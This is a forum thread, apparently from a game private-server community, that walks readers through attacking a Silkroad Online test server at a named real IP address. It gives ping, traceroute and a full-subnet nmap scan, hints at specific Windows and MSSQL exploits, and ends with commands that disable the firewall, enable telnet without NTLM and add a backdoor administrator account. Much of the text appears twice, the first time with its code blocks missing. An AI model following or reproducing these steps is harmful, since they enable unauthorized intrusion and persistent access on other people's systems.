So, since there was tons of spam in the previous thread at psro section, i'm opening it here again. Please, keep this topic clean.
So, as thread subject says, operation "SRO Blitzkrieq" starts soon. More info comes in next few hours.
For mods, please, stick this thread - this is going to be interesting.
=========================================
SRO Blitzkrieq -> Beginning
So, here the stuff begins. As far as many of you already know, there is a vSRO test server running on the net out there.
The IP address is pretty well known to everyone out here.
(u can use wireshark to get the ip addr of xtrap default vsro test update server)
You may try pinging it, to ensure it's up.
Well, let's see what we got there ?
Let's trace route.
Code:
(first few hops removed)
Trace complete.
We see few gateways there, huh ? Seems like a pretty huge network, lulz.
Let's scan the "closest" machines to our target. (i'd preffer NMAP)
And what do we see there ? Lots of shit.
Tons of machines with MSSQL 2000 SP4 machines, available SMB services, ftp servers, etc...
=========================================
More hints comes shortly.
=========================================
Blitzkrieq -> Part 2
HINT :
==========================================
More hints comes shortly.
===========================================
SRO Blitzkrieq -> Part 3
Disabling firewall, starting telnet server. Many people asked for this...
===========================================
So, as thread subject says, operation "SRO Blitzkrieq" starts soon. More info comes in next few hours.
For mods, please, stick this thread - this is going to be interesting.
=========================================
SRO Blitzkrieq -> Beginning
So, here the stuff begins. As far as many of you already know, there is a vSRO test server running on the net out there.
The IP address is pretty well known to everyone out here.
Code:
123.30.200.70
You may try pinging it, to ensure it's up.
Code:
cmd -> ping 123.30.200.70
Let's trace route.
Code:
Code:
cmd -> tracert 123.30.200.70
Code:
7 277 ms 276 ms 276 ms 80.156.161.62 8 303 ms 304 ms 303 ms 203.162.217.25 9 304 ms 304 ms 303 ms static.vdc.vn [222.255.165.33] 10 313 ms 313 ms 313 ms 203.162.231.9 11 318 ms 318 ms 319 ms static.vdc.vn [123.30.63.26] 12 313 ms 313 ms 313 ms static.vdc.vn [123.30.63.66] 13 314 ms 314 ms 313 ms dynamic.vdc.vn [123.30.200.254] 14 313 ms 313 ms 313 ms dynamic.vdc.vn [123.30.200.70]
We see few gateways there, huh ? Seems like a pretty huge network, lulz.
Let's scan the "closest" machines to our target. (i'd preffer NMAP)
Code:
nmap -T4 -A -v 123.30.200.0-255
Tons of machines with MSSQL 2000 SP4 machines, available SMB services, ftp servers, etc...
=========================================
More hints comes shortly.
=========================================
Blitzkrieq -> Part 2
HINT :
Code:
ms netapi 067 ms 09_004_sp_replwritetovarbin
More hints comes shortly.
===========================================
SRO Blitzkrieq -> Part 3
Disabling firewall, starting telnet server. Many people asked for this...
Code:
netsh firewall set opmode disable sc config tlntsvr start= auto tlntadmn config port=23 sec=-NTLM net start Telnet net user Admin 7755xx! /add net localgroup Administrators Admin /add